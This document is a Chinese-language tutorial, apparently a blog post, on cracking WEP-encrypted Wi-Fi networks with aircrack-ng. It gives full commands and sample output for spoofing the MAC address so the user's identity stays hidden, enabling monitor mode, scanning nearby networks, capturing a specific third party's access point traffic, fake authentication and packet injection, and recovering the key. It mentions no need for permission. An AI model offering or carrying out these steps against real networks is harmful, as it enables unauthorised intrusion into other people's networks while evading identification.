下载代码:http://www.aircrack-ng.org
修改common.mak文件
找到 CC=$(TOOL_PREFIX)gcc
改成CC=$(TOOL_PREFIX)gcc-4.0
找到CFLAS ?= -g -W ...
在后面添加 -Wno-strict-aliasing -arch i386 -isysroot /Developer/SDKs/MacOSX10.7.sdk
背景&前提
1. 本文所阐述的破解技术是基于WEP格式的加密无线网络。
2. 本文假定你使用的是Ubuntu Linux操作系统,Windows平台下所用方法与本文类似。
3. 本文假定你有一个可以接收无线信号的网卡,同时该网卡支持监听(monitor)模式。
4. 本文假定你的网卡可以接收到无线信号,即在你的周围有无线信号。
准备工作
在正式进入破解之前,还是需要做一些准备工作的。
1. 安装aircrack-ng无线破解软件
1. 打开终端(Applications->Accessories->Terminal)。
2. 输入命令:
sudo apt-get install aircrack-ng
3. 这时aircrack-ng会自动下载并安装。
4. (完成后可在终端中输入以下命令
sudo aircrack-ng --help
来测试是否安装成功)。
5. 其实,下载的aircrack-ng不仅仅是“一个”程序,而是一个套件。本文中,我们将会用到其中的:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
2. 获取本机无线网卡信息
首先我们应该知道我们的无线网卡在系统中叫什么名字(也就是标识)。
1. 输入命令:
sudo ifconfig
2. 在输出的内容中,我们应该可以看到类似于”wlan0″的标识,如下图所示。
3. wlan0 Link encap:Ethernet HWaddr 00:22:fa:88:50:4e
4. inet6 addr: fe80::20da:a7ff:fe90:a6f5/64 Scopeink
5. UP BROADCAST MULTICAST MTU:1500 Metric:1
6. RX packets:1961 errors:0 dropped:0 overruns:0 frame:0
7. TX packets:2123 errors:0 dropped:0 overruns:0 carrier:0
8. collisions:0 txqueuelen:1000
RX bytes:1838600 (1.8 MB) TX bytes:473232 (473.2 KB)
(后文中,wlan0就表示我们要操纵的无线网卡)
9. 输出内容HWaddr后便是无线网卡(wlan0)的MAC地址 00:22:fa:88:50:4e
3. 修改无线网卡地址(推荐)
如果你不想被别人知道你的真实身份的话,建议你修改自己的无线网卡地址(MAC地址)。
在此我们使用macchanger这个程序来修改自己的网卡地址。
1. 安装macchanger:
sudo apt-get install macchanger
2. 在修改之前,需要把网卡停止:
sudo ifconfig wlan0 down
3. 将自己的网卡地址修改成随机地址:
sudo macchanger -r wlan0
命令中的-r 表示将网卡wlan0的网卡地址修改为任意值,我们此时修改为:22:da:a7:90:a6:f5。
Current MAC: 00:22:fa:88:50:4e (unknown)
Faked MAC: 22:da:a7:90:a6:f5 (unknown)
4. 重新启用无线网卡:
sudo ifconfig wlan0 up
开始破解
准备工作完成后,便可进入破解工作。
1. 将网卡调整到监听模式
在正常状态下,无线网卡是无法侦测到附近电脑与无线接入点之间的通信的。所以为了获取它们之间的通信数据,我们需要开启无线网卡的监听模式。
1. 在修改之前通过命令:
iwconfig
来查看现在的网卡信息,并通过如下命令:
sudo airmon-ng start wlan0
来开启无线网卡wlan0的监听模式。
2. (开启之后的监听网卡名字默认为mon0,可通过命令:
iwconfig
来查看网卡信息,我们会发现现在系统多出一个网卡mon0,状态为:Monitor态)
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.432 GHz Tx-Power=20 dBm
Retry long limit:7 RTS thrff Fragment thrff
Power Managementff
2. 查看附近无线网络
现在我们就可以查看附近有哪些无线网络了。
1. 通过命令:
sudo airodump-ng mon0
来查看无线网络,结果如下所示(经过处理):
CH 5 ][ Elapsed: 12 s ][ 20XX-XX-02 10:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:CD:5A:94:12 -47 75 2 0 6 54 . WEP WEP zhy
00:25:86:XX:XX:XX -58 70 6 0 6 54 . WEP WEP 317
C8:3A:35:XX:XX:XX -75 23 0 0 6 54e WPA2 CCMP PSK 415
00:23:CD:XX:XX:XX -75 21 0 0 3 54 . WEP WEP 314
00:27:19:XX:XX:XX -73 28 0 0 6 54 . WPA2 CCMP PSK TP-LINK_78CFD4
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:253:XX:XX:XX -70 0 - 1 42 36
(not associated) 00:1C:BF:XX:XX:XX -70 0 - 1 1 3
(not associated) 00:253:XX:XX:XX -56 0 - 1 14 72
(not associated) 00:26:82:XX:XX:XX -76 0 - 1 21 5 FAST
00:23:CD:5A:94:12 00:13:02:XX:XX:XX -76 48 -54 0 2
2. 当周围环境中的无线网络接入点基本显示完全后,Ctrl+C结束当前程序。但是不要关闭当前窗口,因为我们还要利用这些数据,为方便下次使用你也可以复制这些数据到文本中。
3. 获取指定无线接入点数据包
比如我们要破解上面的一个BSSID为:00:23:CD:5A:94:12的接入点(ESSID为:zhy),我们就需要获取它相应的数据包。
1. 打开一个新的终端,并输入命令:
sudo airodump-ng mon0 -w meiyou --bssid 00:23:CD:5A:94:12 -c 6
其中,参数-w指明数据保存文件(meiyou),参数–bssid指明要截取数据包的接入点MAC地址,参数-c指明获取的频道为6。
2. (当前程序不要中止,再打开一个新的终端,进行下一步)
4. 对无线接入点进行注入(推荐)
如果你感觉上面数据包截取的数据(#Data项)速度太慢,那么你最好对该接入点进行注入。(注:有时,该方法对某些类型的接入点不太好用)
1. 和该接入点进行关联
1. 在刚才打开的新终端下,输入命令:
sudo aireplay-ng -1 0 -a 00:23:CD:5A:94:12 -h 22:da:a7:90:a6:f5 mon0
其中,参数-1指明这是虚拟认证(Fake authentication),参数0含义不明(官方解释为:0 reassociation timing in seconds),参数-a指明接入点MAC地址,参数-h指明本机MAC地址,mon0为本机网卡名称。
2. 如果返回结果如下所示,就说明你已经和该接入点关联起来了:
3. 09:50:52 Waiting for beacon frame (BSSID: 00:23:CD:5A:94:12) on channel 6
4.
5. 09:50:52 Sending Authentication Request (Open System) [ACK]
6. 09:50:52 Authentication successful
7. 09:50:52 Sending Association Request [ACK]
09:50:52 Association successful :-) (AID: 1)
2. 对该接入点进行注入
1. 通过命令:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:23:CD:5A:94:12 -h 22:da:a7:90:a6:f5 mon0
其中,参数-2指明这是Interactive packet replay方式,参数-F指明使用第一个匹配的数据包,参数-p指明数据帧的控制字符,参数-c指明目的MAC地址,参数-b指明接入点MAC地址,参数-h指明源地址MAC地址,mon0为本机网卡名称。
2. 如果返回结果如下所示,那么这时,上一个正在截获数据的终端的#Data项数值应该会疯涨,表明注入成功。
3. Saving chosen packet in replay_src-0502-095620.cap
4. You should also start airodump-ng to capture replies.
5.
Sent 3152 packets...(499 pps)
6. (当前程序不要中止,因为我们需要一直进行注入,直到下一步的破解成功为止)
5. 破解WEP密码
现在,airodump-ng命令正在截获指定接入点的通信数据,aireplay-ng命令正在对指定接入点进行注入,以增加数据量。那么现在,我们就可以通过另一个命令来处理这些正在截获的数据,以求破解其中的WEP密码。
1. 打开一个新的终端,输入命令:
ls meiyou*
列出了刚才保存的数据文件(meiyou-01.cap),如果你多次截取的话,应该会有多个cap文件。
2. 通过如下命令,加载数据截取文件,破解WEP密码:
sudo aircrack-ng meiyou-01.cap
如果你需要加载多个文件,同时进行破解,输入如下命令:
sudo aircrack-ng meiyou-*.cap
3. 现在aircrack-ng程序正在对数据截取文件进行破解,企图找到WEP密码,如果没有找到密码,aircrack-ng程序会等到另一终端截(airodump-ng)取到5000个数据后,重新进行破解。
4. (现在你应该开着3个终端,一个正在截取接入点数据,一个正在对接入点进行注入,还有一个正在对所截取的文件进行WEP密码破解。如果最后一个终端显示出密码话,进入下一步收尾工作)
5. 如果一切顺利,密码会自动显示出来:
6. Aircrack-ng 1.1
7.
8. [00:01:41] Tested 87 keys (got 25012 IVs)
9.
10. KB depth byte(vote)
11. 0 0/ 1 62(37120) 11(33536) 4C(33536) 70(33536) 87(33024)
12. 1 0/ 1 61(39168) 27(35072) AF(34304) CC(34048) 83(33792)
13. 2 3/ 5 1F(33792) 2C(33280) 3E(33280) 82(33024) 9F(33024)
14. 3 0/ 3 64(34816) 58(34048) B5(34048) 6A(33280) 7C(33280)
15. 4 1/ 7 75(34304) 50(33792) F1(33792) 10(33536) 23(33536)
16.
17. KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
Decrypted correctly: 100%
6. 收尾工作
1. 终止aireplay-ng程序对无线接入点的注入(Ctrl+Z终止程序)
2. 终止airodump-ng程序对数据的截获(Ctrl+C 终止程序)
3. 至此,完成对指定接入点的WEP密码破解。
http://rhodzy.com/easily-install-aircrack-mac-os-x
http://blog.nightlionsecurity.com/hacking/2012/03/guide-to-install-aircrack-ng-on-mac-osx-10-7-lion/